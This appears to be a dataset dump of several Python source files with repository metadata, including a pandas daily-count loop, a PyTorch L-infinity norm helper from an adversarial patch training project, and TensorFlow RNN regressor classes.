start_date = min(df_clean_data['reported_date'])
end_date = max(df_clean_data['reported_date'])
delta_d = datetime.timedelta(days=1)
# iterate over days
while start_date <= end_date:
    actual_date = start_date
    data_i_mask = df_clean_data['reported_date'] == actual_date
    data_i = pd.DataFrame(df_clean_data[data_i_mask])
    df_states_data = pd.DataFrame(columns=['reported_date', 'I1', 'I2', 'I3', 'D', 'R'])
    print(sum(data_i['type'] == 2))
    df_states_data['reported_date'] = actual_date
    df_states_data['I1'] = sum(data_i['type'] == 2)
    df_states_data['I2'] = sum(data_i['type'] == 3)
    df_states_data['I3'] = sum(data_i['type'] == 4)
    df_states_data['D'] = sum(data_i['type'] == 5)
    df_states_data['R'] = sum(data_i['type'] == 6)
    df_states_list.append(df_states_data)
    start_date += delta_d
df_return = pd.concat(df_states_list)
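# Illustrative check (not part of the original script): the parser expects
# DD/MM/YYYY, so day and month must not be swapped.
assert str_to_datetime('05/03/2021') == datetime.date(2021, 3, 5)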
| 38.284884
| 124
| 0.673956
| 897
| 6,585
| 4.584169
| 0.138239
| 0.064202
| 0.048152
| 0.074903
| 0.839494
| 0.839494
| 0.831226
| 0.799854
| 0.796693
| 0.796693
| 0
| 0.015149
| 0.208049
| 6,585
| 172
| 125
| 38.284884
| 0.773346
| 0.044039
| 0
| 0.785185
| 0
| 0
| 0.153234
| 0.04683
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0
| 0.022222
| 0
| 0.066667
| 0.007407
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f1e5fb301f7e3afa076783bd96ee57213ac4d86d
| 1,491
|
py
|
Python
|
attacks/norms.py
|
sukrutrao/Adversarial-Patch-Training
|
b7322e6f4d94029ceb0dcb946d2b6852c795990f
|
[
"Unlicense"
] | 21
|
2020-08-04T12:47:03.000Z
|
2022-03-22T09:34:29.000Z
|
attacks/norms.py
|
sukrutrao/Adversarial-Patch-Training
|
b7322e6f4d94029ceb0dcb946d2b6852c795990f
|
[
"Unlicense"
] | 3
|
2021-06-08T22:13:00.000Z
|
2022-03-12T00:45:16.000Z
|
attacks/norms.py
|
sukrutrao/Adversarial-Patch-Training
|
b7322e6f4d94029ceb0dcb946d2b6852c795990f
|
[
"Unlicense"
] | 6
|
2020-08-04T12:47:05.000Z
|
2022-02-13T00:58:03.000Z
|
import torch
import math


class Norm:
    def __call__(self, perturbations):
        """
        Norm.
        :param perturbations: perturbations
        :type perturbations: torch.autograd.Variable
        """
        raise NotImplementedError()

    def normalize(self, gradients):
        """
        Normalization.
        :param gradients: gradients
        :type gradients: torch.autograd.Variable
        """
        raise NotImplementedError()

    def scale(self, gradients):
        """
        Normalization.
        :param gradients: gradients
        :type gradients: torch.autograd.Variable
        """
        raise NotImplementedError()


class LInfNorm(Norm):
    def __call__(self, perturbations):
        """
        Norm.
        :param perturbations: perturbations
        :type perturbations: torch.autograd.Variable
        """
        return torch.max(torch.abs(perturbations.view(perturbations.size()[0], -1)), dim=1)[0]

    def normalize(self, gradients):
        """
        Normalization.
        :param gradients: gradients
        :type gradients: torch.autograd.Variable
        """
        gradients.data = torch.sign(gradients.data)

    def scale(self, gradients):
        """
        Normalization.
        :param gradients: gradients
        :type gradients: torch.autograd.Variable
        """
        gradients.data = torch.div(gradients.data, torch.max(torch.abs(gradients.data.view(gradients.size()[0], -1)), dim=1)[0].view(-1, 1, 1, 1))
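# Illustrative usage sketch (not part of the original module; the batch shape
# below is an assumption):
if __name__ == "__main__":
    perturbations = torch.randn(8, 3, 32, 32, requires_grad=True)
    norm = LInfNorm()
    print(norm(perturbations))          # per-example L-inf magnitudes, shape [8]
    (perturbations ** 2).sum().backward()
    norm.normalize(perturbations.grad)  # in-place: each gradient entry becomes its sign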
| 22.938462
| 146
| 0.594232
| 138
| 1,491
| 6.362319
| 0.224638
| 0.088838
| 0.143508
| 0.14123
| 0.801822
| 0.801822
| 0.749431
| 0.749431
| 0.749431
| 0.749431
| 0
| 0.011331
| 0.289738
| 1,491
| 65
| 146
| 22.938462
| 0.817753
| 0.345406
| 0
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.375
| false
| 0
| 0.125
| 0
| 0.6875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
f1f06f0e07d0e6221172b657724d4ac58491e51b
| 41
|
py
|
Python
|
external/models/TransH_USE_h1/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
external/models/TransH_USE_h1/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
external/models/TransH_USE_h1/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
from .TransH_USE_h1 import TransH_USE_h1
| 20.5
| 40
| 0.878049
| 8
| 41
| 4
| 0.625
| 0.5625
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.097561
| 41
| 1
| 41
| 41
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f1f84e95138418b31bbba2da5270921e626ca2c3
| 29,188
|
py
|
Python
|
corl/model/base.py
|
agux/faix
|
99fcca313518b57dcde46c2ddcea9896598b64ea
|
[
"MIT"
] | null | null | null |
corl/model/base.py
|
agux/faix
|
99fcca313518b57dcde46c2ddcea9896598b64ea
|
[
"MIT"
] | 7
|
2020-04-04T04:53:36.000Z
|
2022-02-10T00:42:39.000Z
|
corl/model/base.py
|
agux/faix
|
99fcca313518b57dcde46c2ddcea9896598b64ea
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
# Path hack.
import sys
import os
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../..")
import functools
import tensorflow as tf
import numpy as np
import math
from pstk.model.model import lazy_property, stddev
from pstk.model.cells import LayerNormNASCell, LayerNormGRUCell

# pylint: disable-msg=E1101


class SRnnRegressor:
    '''
    Simple RNN Regressor using one of:
        GRU,
        GRUBlock,
        LSTM,
        BasicLSTM,
        LayerNormBasicLSTM,
        GLSTM,
        GridLSTM,
        LSTMBlock,
        UGRNN,
        NAS,
        etc...
    '''

    def __init__(self, data, target, seqlen, cell, use_peepholes=False, groups=1,
                 tied=False, layer_width=200, learning_rate=1e-3):
        self.data = data
        self.target = target
        self.seqlen = seqlen
        self._layer_width = layer_width
        self._learning_rate = learning_rate
        self._cell = cell
        self._use_peepholes = use_peepholes
        self._tied = tied
        self._groups = groups
        self.logits
        self.optimize
        self.cost
        self.worst

    def getName(self):
        return self.__class__.__name__

    @lazy_property
    def logits(self):
        layer = self.rnn(self, self.data)
        output = tf.compat.v1.layers.dense(
            inputs=layer,
            units=1,
            kernel_initializer=tf.compat.v1.truncated_normal_initializer(
                stddev=stddev(1.0, int(layer.get_shape()[-1]))),
            bias_initializer=tf.compat.v1.constant_initializer(0.1),
            activation=tf.nn.tanh,
            name="output"
        )
        output = tf.squeeze(output)
        return output

    @staticmethod
    def rnn(self, inputs):
        c = None
        _cell = self._cell.lower()
        if _cell == 'gru':
            c = tf.compat.v1.nn.rnn_cell.GRUCell(
                num_units=self._layer_width
            )
        elif _cell == 'grublock':
            c = tf.contrib.rnn.GRUBlockCellV2(
                num_units=self._layer_width
            )
        elif _cell == 'lstm':
            c = tf.compat.v1.nn.rnn_cell.LSTMCell(
                num_units=self._layer_width,
                use_peepholes=self._use_peepholes
            )
        elif _cell == 'basiclstm':
            c = tf.compat.v1.nn.rnn_cell.BasicLSTMCell(
                num_units=self._layer_width
            )
        elif _cell == 'layernormbasiclstm':
            c = tf.contrib.rnn.LayerNormBasicLSTMCell(
                num_units=self._layer_width
            )
        elif _cell == 'glstm':
            c = tf.contrib.rnn.GLSTMCell(
                num_units=self._layer_width,
                number_of_groups=self._groups
            )
        elif _cell == 'gridlstm':
            c = tf.contrib.rnn.GridLSTMCell(
                num_units=self._layer_width,
                use_peephole=self._use_peepholes,
                share_time_frequency_weights=self._tied,
                num_unit_shards=self._groups
                # feature_size = feat_size,
                # num_frequency_blocks = ?
            )
        elif _cell == 'grid1lstm':
            c = tf.contrib.grid_rnn.Grid1LSTMCell(
                num_units=self._layer_width,
                use_peepholes=self._use_peepholes,
                output_is_tuple=False
            )
        elif _cell == 'grid2lstm':
            c = tf.contrib.grid_rnn.Grid2LSTMCell(
                num_units=self._layer_width,
                use_peepholes=self._use_peepholes,
                tied=self._tied,
                output_is_tuple=False
            )
        elif _cell == 'grid3lstm':
            c = tf.contrib.grid_rnn.Grid3LSTMCell(
                num_units=self._layer_width,
                use_peepholes=self._use_peepholes,
                tied=self._tied,
                output_is_tuple=False
            )
        elif _cell == 'grid2gru':
            c = tf.contrib.grid_rnn.Grid2GRUCell(
                num_units=self._layer_width,
                tied=self._tied,
                output_is_tuple=False
            )
        elif _cell == 'lstmblock':
            c = tf.contrib.rnn.LSTMBlockCell(
                num_units=self._layer_width,
                use_peephole=self._use_peepholes
            )
        elif _cell == 'nas':
            c = tf.contrib.rnn.NASCell(
                num_units=self._layer_width,
                use_biases=True
            )
        elif _cell == 'ugrnn':
            c = tf.contrib.rnn.UGRNNCell(
                num_units=self._layer_width
            )
        else:
            raise ValueError('unrecognized cell type:{}'.format(_cell))
        output, _ = tf.compat.v1.nn.dynamic_rnn(
            # output, _ = tf.nn.dynamic_rnn(
            c,
            inputs,
            dtype=tf.float32,
            sequence_length=self.seqlen
        )
        output = self.last_relevant(output, self.seqlen)
        print('last time step: {}'.format(output.get_shape()))
        return output

    @staticmethod
    def last_relevant(output, length):
        with tf.compat.v1.name_scope("last_relevant"):
            batch_size = tf.shape(input=output)[0]
            relevant = tf.gather_nd(output, tf.stack(
                [tf.range(batch_size), length - 1], axis=1))
            return relevant

    @lazy_property
    def cost(self):
        logits = self.logits
        with tf.compat.v1.name_scope("cost"):
            return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)

    @lazy_property
    def optimize(self):
        return tf.compat.v1.train.AdamOptimizer(
            self._learning_rate, epsilon=1e-7
        ).minimize(self.cost, global_step=tf.compat.v1.train.get_global_step())

    @lazy_property
    def worst(self):
        logits = self.logits
        with tf.compat.v1.name_scope("worst"):
            sqd = tf.math.squared_difference(logits, self.target)
            bidx = tf.argmax(input=sqd)
            max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
            predict = tf.gather(logits, bidx)
            actual = tf.gather(self.target, bidx)
            return bidx, max_diff, predict, actual


class SRnnRegressorV2:
    '''
    Simple RNN Regressor using one of:
        GRU,
        GRUBlock,
        LSTM,
        BasicLSTM,
        LayerNormBasicLSTM,
        GLSTM,
        GridLSTM,
        LSTMBlock,
        UGRNN,
        NAS,
        etc...
    '''

    def __init__(self, data, target, seqlen, cell, use_peepholes=False, groups=1,
                 tied=False, layer_width=200, learning_rate=1e-3):
        self.data = data
        self.target = target
        self.seqlen = seqlen
        self._layer_width = layer_width
        self._learning_rate = learning_rate
        self._cell = cell
        self._use_peepholes = use_peepholes
        self._tied = tied
        self._groups = groups
        self.logits
        self.optimize
        self.cost
        self.worst

    def getName(self):
        return self.__class__.__name__

    @lazy_property
    def logits(self):
        layer = self.rnn(self, self.data)
        layer = tf.nn.relu(layer)
        output = tf.compat.v1.layers.dense(
            inputs=layer,
            units=1,
            kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
            bias_initializer=tf.compat.v1.constant_initializer(0.1),
            # activation=tf.nn.tanh,
            name="output"
        )
        output = tf.squeeze(output)
        return output

    @staticmethod
    def rnn(self, inputs):
        c = None
        _cell = self._cell.lower()
        if _cell == 'gru':
            c = tf.compat.v1.nn.rnn_cell.GRUCell(
                num_units=self._layer_width
            )
        elif _cell == 'grublock':
            c = tf.contrib.rnn.GRUBlockCellV2(
                num_units=self._layer_width
            )
        elif _cell == 'lstm':
            c = tf.compat.v1.nn.rnn_cell.LSTMCell(
                num_units=self._layer_width,
                use_peepholes=self._use_peepholes
            )
        elif _cell == 'basiclstm':
            c = tf.compat.v1.nn.rnn_cell.BasicLSTMCell(
                num_units=self._layer_width
            )
        elif _cell == 'layernormbasiclstm':
            c = tf.contrib.rnn.LayerNormBasicLSTMCell(
                num_units=self._layer_width
            )
        elif _cell == 'glstm':
            c = tf.contrib.rnn.GLSTMCell(
                num_units=self._layer_width,
                number_of_groups=self._groups
            )
        elif _cell == 'gridlstm':
            c = tf.contrib.rnn.GridLSTMCell(
                num_units=self._layer_width,
                use_peephole=self._use_peepholes,
                share_time_frequency_weights=self._tied,
                num_unit_shards=self._groups
                # feature_size = feat_size,
                # num_frequency_blocks = ?
            )
        elif _cell == 'grid1lstm':
            c = tf.contrib.grid_rnn.Grid1LSTMCell(
                num_units=self._layer_width,
                use_peepholes=self._use_peepholes,
                output_is_tuple=False
            )
        elif _cell == 'grid2lstm':
            c = tf.contrib.grid_rnn.Grid2LSTMCell(
                num_units=self._layer_width,
                use_peepholes=self._use_peepholes,
                tied=self._tied,
                output_is_tuple=False
            )
        elif _cell == 'grid3lstm':
            c = tf.contrib.grid_rnn.Grid3LSTMCell(
                num_units=self._layer_width,
                use_peepholes=self._use_peepholes,
                tied=self._tied,
                output_is_tuple=False
            )
        elif _cell == 'grid2gru':
            c = tf.contrib.grid_rnn.Grid2GRUCell(
                num_units=self._layer_width,
                tied=self._tied,
                output_is_tuple=False
            )
        elif _cell == 'lstmblock':
            c = tf.contrib.rnn.LSTMBlockCell(
                num_units=self._layer_width,
                use_peephole=self._use_peepholes
            )
        elif _cell == 'nas':
            c = tf.contrib.rnn.NASCell(
                num_units=self._layer_width,
                use_biases=True
            )
        elif _cell == 'ugrnn':
            c = tf.contrib.rnn.UGRNNCell(
                num_units=self._layer_width
            )
        else:
            raise ValueError('unrecognized cell type:{}'.format(_cell))
        output, _ = tf.compat.v1.nn.dynamic_rnn(
            # output, _ = tf.nn.dynamic_rnn(
            c,
            inputs,
            dtype=tf.float32,
            sequence_length=self.seqlen
        )
        output = self.last_relevant(output, self.seqlen)
        print('last time step: {}'.format(output.get_shape()))
        return output

    @staticmethod
    def last_relevant(output, length):
        with tf.compat.v1.name_scope("last_relevant"):
            batch_size = tf.shape(input=output)[0]
            relevant = tf.gather_nd(output, tf.stack(
                [tf.range(batch_size), length - 1], axis=1))
            return relevant

    @lazy_property
    def cost(self):
        logits = self.logits
        with tf.compat.v1.name_scope("cost"):
            return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)

    @lazy_property
    def optimize(self):
        return tf.compat.v1.train.AdamOptimizer(
            self._learning_rate, epsilon=1e-7
        ).minimize(self.cost, global_step=tf.compat.v1.train.get_global_step())

    @lazy_property
    def worst(self):
        logits = self.logits
        with tf.compat.v1.name_scope("worst"):
            sqd = tf.math.squared_difference(logits, self.target)
            bidx = tf.argmax(input=sqd)
            max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
            predict = tf.gather(logits, bidx)
            actual = tf.gather(self.target, bidx)
            return bidx, max_diff, predict, actual


class SRnnRegressorV3:
    '''
    Simple RNN Regressor using GridRNNCell, internal cell type is LSTMBlockCell.
    '''

    def __init__(self, data=None, target=None, seqlen=None, layer_width=200, dim=3, learning_rate=1e-3):
        self.data = data
        self.target = target
        self.seqlen = seqlen
        self._layer_width = layer_width
        self._dim = dim
        self._learning_rate = learning_rate
        if data is not None and target is not None and seqlen is not None:
            self.logits
            self.optimize
            self.cost
            # note: `worst` gathers self.uuids, which is only set via setNodes()
            self.worst

    def setNodes(self, uuids, features, target, seqlen):
        self.uuids = uuids
        self.data = features
        self.target = target
        self.seqlen = seqlen
        self.logits
        self.optimize
        self.cost
        self.worst

    def getName(self):
        return self.__class__.__name__

    @lazy_property
    def logits(self):
        layer = self.rnn(self, self.data)
        with tf.compat.v1.variable_scope("output"):
            layer = tf.nn.selu(layer)
            output = tf.compat.v1.layers.dense(
                inputs=layer,
                units=1,
                kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
                bias_initializer=tf.compat.v1.constant_initializer(0.1)
            )
        output = tf.squeeze(output)
        return output

    @staticmethod
    def newCell(width, _dim):
        def cell_fn(n):
            return tf.contrib.rnn.LSTMBlockCell(
                num_units=n,
                use_peephole=True
            )
        c = tf.contrib.grid_rnn.GridRNNCell(
            num_units=width,
            num_dims=_dim,
            input_dims=0,
            output_dims=0,
            priority_dims=0,
            tied=False,
            non_recurrent_dims=None,
            cell_fn=cell_fn,
            non_recurrent_fn=None,
            state_is_tuple=True,
            output_is_tuple=True
        )
        return c

    @staticmethod
    def rnn(self, inputs):
        output, _ = tf.compat.v1.nn.dynamic_rnn(
            self.newCell(self._layer_width, self._dim),
            inputs,
            dtype=tf.float32,
            sequence_length=self.seqlen
        )
        output = tf.concat(output, 1)
        output = self.last_relevant(output, self.seqlen)
        return output

    @staticmethod
    def last_relevant(output, length):
        with tf.compat.v1.name_scope("last_relevant"):
            batch_size = tf.shape(input=output)[0]
            relevant = tf.gather_nd(output, tf.stack(
                [tf.range(batch_size), length - 1], axis=1))
            return relevant

    @lazy_property
    def cost(self):
        logits = self.logits
        with tf.compat.v1.name_scope("cost"):
            return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)

    @lazy_property
    def optimize(self):
        return tf.compat.v1.train.AdamOptimizer(
            self._learning_rate, epsilon=1e-7
        ).minimize(self.cost, global_step=tf.compat.v1.train.get_or_create_global_step())

    @lazy_property
    def worst(self):
        logits = self.logits
        with tf.compat.v1.name_scope("worst"):
            sqd = tf.math.squared_difference(logits, self.target)
            bidx = tf.argmax(input=sqd)
            max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
            uuid = tf.gather(self.uuids, bidx)
            predict = tf.gather(logits, bidx)
            actual = tf.gather(self.target, bidx)
            return uuid, max_diff, predict, actual


class SRnnRegressorV4:
    '''
    Simple RNN Regressor using GridRNNCell, internal cell type is LSTMBlockCell.
    With alpha_dropout, selu, and lecun_normal initializer.
    '''

    def __init__(self, data=None, target=None, seqlen=None, layer_width=200, dim=3, dropout=0.5, learning_rate=1e-3):
        self.data = data
        self.target = target
        self.seqlen = seqlen
        self._layer_width = layer_width
        self._dim = dim
        self._learning_rate = learning_rate
        self._dropout = dropout
        if data is not None and target is not None and seqlen is not None:
            self.logits
            self.optimize
            self.cost
            self.worst

    def setNodes(self, uuids, features, target, seqlen):
        self.uuids = uuids
        self.data = features
        self.target = target
        self.seqlen = seqlen
        self.logits
        self.optimize
        self.cost
        self.worst

    def getName(self):
        return self.__class__.__name__

    @lazy_property
    def logits(self):
        layer = self.rnn(self, self.data)
        layer = self.fcn(self, layer)
        with tf.compat.v1.variable_scope("output"):
            output = tf.compat.v1.layers.dense(
                inputs=layer,
                units=1,
                # kernel_initializer=tf.variance_scaling_initializer(),
                kernel_initializer=tf.compat.v1.keras.initializers.lecun_normal(),
                bias_initializer=tf.compat.v1.constant_initializer(0.1)
            )
        output = tf.squeeze(output)
        return output

    @staticmethod
    def fcn(self, inputs):
        layer = inputs
        with tf.compat.v1.variable_scope("fcn"):
            layer = tf.contrib.nn.alpha_dropout(layer, keep_prob=1.0 - self._dropout)
            layer = tf.compat.v1.layers.dense(
                inputs=layer,
                units=self._layer_width,
                kernel_initializer=tf.compat.v1.keras.initializers.lecun_normal(),
                bias_initializer=tf.compat.v1.constant_initializer(0.1),
                activation=tf.nn.selu
            )
        return layer

    @staticmethod
    def newCell(width, _dim):
        def cell_fn(n):
            return tf.contrib.rnn.LSTMBlockCell(
                num_units=n,
                use_peephole=True
            )
        c = tf.contrib.grid_rnn.GridRNNCell(
            num_units=width,
            num_dims=_dim,
            input_dims=0,
            output_dims=0,
            priority_dims=0,
            tied=False,
            non_recurrent_dims=None,
            cell_fn=cell_fn,
            non_recurrent_fn=None,
            state_is_tuple=True,
            output_is_tuple=True
        )
        return c

    @staticmethod
    def rnn(self, inputs):
        output, _ = tf.compat.v1.nn.dynamic_rnn(
            self.newCell(self._layer_width, self._dim),
            inputs,
            dtype=tf.float32,
            sequence_length=self.seqlen
        )
        output = tf.concat(output, 1)
        output = self.last_relevant(output, self.seqlen)
        return output

    @staticmethod
    def last_relevant(output, length):
        with tf.compat.v1.name_scope("last_relevant"):
            batch_size = tf.shape(input=output)[0]
            relevant = tf.gather_nd(output, tf.stack(
                [tf.range(batch_size), length - 1], axis=1))
            return relevant

    @lazy_property
    def cost(self):
        logits = self.logits
        with tf.compat.v1.name_scope("cost"):
            return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)

    @lazy_property
    def optimize(self):
        return tf.compat.v1.train.AdamOptimizer(
            self._learning_rate, epsilon=1e-7
        ).minimize(self.cost, global_step=tf.compat.v1.train.get_or_create_global_step())

    @lazy_property
    def worst(self):
        logits = self.logits
        with tf.compat.v1.name_scope("worst"):
            sqd = tf.math.squared_difference(logits, self.target)
            bidx = tf.argmax(input=sqd)
            max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
            uuid = tf.gather(self.uuids, bidx)
            predict = tf.gather(logits, bidx)
            actual = tf.gather(self.target, bidx)
            return uuid, max_diff, predict, actual


class SRnnRegressorV5:
    '''
    Simple RNN Regressor using GridRNNCell, internal cell type is BasicLSTMCell.
    With dropout, relu, and variance_scaling_initializer.
    '''

    def __init__(self, data=None, target=None, seqlen=None, layer_width=200, dim=3, dropout=0.5, learning_rate=1e-3):
        self.data = data
        self.target = target
        self.seqlen = seqlen
        self._layer_width = layer_width
        self._dim = dim
        self._learning_rate = learning_rate
        self._dropout = dropout
        if data is not None and target is not None and seqlen is not None:
            self.logits
            self.optimize
            self.cost
            self.worst

    def setNodes(self, uuids, features, target, seqlen):
        self.uuids = uuids
        self.data = features
        self.target = target
        self.seqlen = seqlen
        self.logits
        self.optimize
        self.cost
        self.worst

    def getName(self):
        return self.__class__.__name__

    @lazy_property
    def logits(self):
        layer = self.rnn(self, self.data)
        layer = self.fcn(self, layer)
        with tf.compat.v1.variable_scope("output"):
            output = tf.compat.v1.layers.dense(
                inputs=layer,
                units=1,
                kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
                bias_initializer=tf.compat.v1.constant_initializer(0.1)
            )
        output = tf.squeeze(output)
        return output

    @staticmethod
    def fcn(self, inputs):
        layer = inputs
        with tf.compat.v1.variable_scope("fcn"):
            layer = tf.nn.dropout(layer, rate=1 - (1.0 - self._dropout))
            layer = tf.compat.v1.layers.dense(
                inputs=layer,
                units=self._layer_width,
                kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
                bias_initializer=tf.compat.v1.constant_initializer(0.1),
                activation=tf.nn.relu
            )
        return layer

    @staticmethod
    def newCell(width, _dim):
        def cell_fn(n):
            return tf.compat.v1.nn.rnn_cell.BasicLSTMCell(
                num_units=n
            )
        c = tf.contrib.grid_rnn.GridRNNCell(
            num_units=width,
            num_dims=_dim,
            input_dims=0,
            output_dims=0,
            priority_dims=0,
            tied=False,
            non_recurrent_dims=None,
            cell_fn=cell_fn,
            non_recurrent_fn=None,
            state_is_tuple=True,
            output_is_tuple=True
        )
        return c

    @staticmethod
    def rnn(self, inputs):
        output, _ = tf.compat.v1.nn.dynamic_rnn(
            self.newCell(self._layer_width, self._dim),
            inputs,
            dtype=tf.float32,
            sequence_length=self.seqlen
        )
        output = tf.concat(output, 1)
        output = self.last_relevant(output, self.seqlen)
        return output

    @staticmethod
    def last_relevant(output, length):
        with tf.compat.v1.name_scope("last_relevant"):
            batch_size = tf.shape(input=output)[0]
            relevant = tf.gather_nd(output, tf.stack(
                [tf.range(batch_size), length - 1], axis=1))
            return relevant

    @lazy_property
    def cost(self):
        logits = self.logits
        with tf.compat.v1.name_scope("cost"):
            return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)

    @lazy_property
    def optimize(self):
        return tf.compat.v1.train.AdamOptimizer(
            self._learning_rate, epsilon=1e-7
        ).minimize(self.cost, global_step=tf.compat.v1.train.get_or_create_global_step())

    @lazy_property
    def worst(self):
        logits = self.logits
        with tf.compat.v1.name_scope("worst"):
            sqd = tf.math.squared_difference(logits, self.target)
            bidx = tf.argmax(input=sqd)
            max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
            uuid = tf.gather(self.uuids, bidx)
            predict = tf.gather(logits, bidx)
            actual = tf.gather(self.target, bidx)
            return uuid, max_diff, predict, actual


class SRnnRegressorV6:
    '''
    Simple RNN Regressor using GridRNNCell, internal cell type is BasicLSTMCell.
    With batch norm, dropout, relu, and variance_scaling_initializer.
    '''

    def __init__(self, data=None, target=None, seqlen=None, layer_width=200, dim=3, training=None, learning_rate=1e-3):
        self.data = data
        self.target = target
        self.seqlen = seqlen
        self._layer_width = layer_width
        self._dim = dim
        self._learning_rate = learning_rate
        self._training = training
        if data is not None and target is not None and seqlen is not None:
            self.logits
            self.optimize
            self.cost
            self.worst

    def setNodes(self, uuids, features, target, seqlen):
        self.uuids = uuids
        self.data = features
        self.target = target
        self.seqlen = seqlen
        self.logits
        self.optimize
        self.cost
        self.worst

    def getName(self):
        return self.__class__.__name__

    @lazy_property
    def logits(self):
        layer = self.rnn(self, self.data)
        layer = self.fcn(self, layer)
        with tf.compat.v1.variable_scope("output"):
            output = tf.compat.v1.layers.dense(
                inputs=layer,
                units=1,
                kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
                bias_initializer=tf.compat.v1.constant_initializer(0.1)
            )
        output = tf.squeeze(output)
        return output

    @staticmethod
    def fcn(self, inputs):
        layer = inputs
        with tf.compat.v1.variable_scope("fcn"):
            layer = tf.contrib.layers.batch_norm(
                inputs=layer,
                is_training=self._training,
                updates_collections=None
            )
            layer = tf.compat.v1.layers.dense(
                inputs=layer,
                units=self._layer_width,
                kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
                bias_initializer=tf.compat.v1.constant_initializer(0.1),
                activation=tf.nn.relu
            )
            layer = tf.compat.v1.layers.dropout(
                inputs=layer,
                rate=0.5,
                training=self._training)
            layer = tf.compat.v1.layers.dense(
                inputs=layer,
                units=self._layer_width,
                kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
                bias_initializer=tf.compat.v1.constant_initializer(0.1),
                activation=tf.nn.relu
            )
        return layer

    @staticmethod
    def newCell(width, _dim):
        def cell_fn(n):
            return tf.compat.v1.nn.rnn_cell.BasicLSTMCell(
                num_units=n
            )
        c = tf.contrib.grid_rnn.GridRNNCell(
            num_units=width,
            num_dims=_dim,
            input_dims=0,
            output_dims=0,
            priority_dims=0,
            tied=False,
            non_recurrent_dims=None,
            cell_fn=cell_fn,
            non_recurrent_fn=None,
            state_is_tuple=True,
            output_is_tuple=True
        )
        return c

    @staticmethod
    def rnn(self, inputs):
        output, _ = tf.compat.v1.nn.dynamic_rnn(
            self.newCell(self._layer_width, self._dim),
            inputs,
            dtype=tf.float32,
            sequence_length=self.seqlen
        )
        output = tf.concat(output, 1)
        output = self.last_relevant(output, self.seqlen)
        return output

    @staticmethod
    def last_relevant(output, length):
        with tf.compat.v1.name_scope("last_relevant"):
            batch_size = tf.shape(input=output)[0]
            relevant = tf.gather_nd(output, tf.stack(
                [tf.range(batch_size), length - 1], axis=1))
            return relevant

    @lazy_property
    def cost(self):
        logits = self.logits
        with tf.compat.v1.name_scope("cost"):
            return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)

    @lazy_property
    def optimize(self):
        return tf.compat.v1.train.AdamOptimizer(
            self._learning_rate, epsilon=1e-7
        ).minimize(self.cost, global_step=tf.compat.v1.train.get_or_create_global_step())

    @lazy_property
    def worst(self):
        logits = self.logits
        with tf.compat.v1.name_scope("worst"):
            sqd = tf.math.squared_difference(logits, self.target)
            bidx = tf.argmax(input=sqd)
            max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
            uuid = tf.gather(self.uuids, bidx)
            predict = tf.gather(logits, bidx)
            actual = tf.gather(self.target, bidx)
            return uuid, max_diff, predict, actual
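# Illustrative graph-construction sketch (not part of the original module).
# It assumes a TF 1.x runtime where tf.contrib.grid_rnn is available; the
# placeholder shapes and the helper name are made up:
def _demo_build_v3():
    uuids = tf.compat.v1.placeholder(tf.string, [None])
    feats = tf.compat.v1.placeholder(tf.float32, [None, 30, 16])  # [batch, time, features]
    target = tf.compat.v1.placeholder(tf.float32, [None])
    slens = tf.compat.v1.placeholder(tf.int32, [None])
    model = SRnnRegressorV3(layer_width=128, dim=3)
    # setNodes wires logits/optimize/cost/worst; worst needs the uuids tensor
    model.setNodes(uuids, feats, target, slens)
    return model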
| 33.549425
| 119
| 0.56811
| 3,306
| 29,188
| 4.794616
| 0.069873
| 0.044414
| 0.055517
| 0.038357
| 0.955334
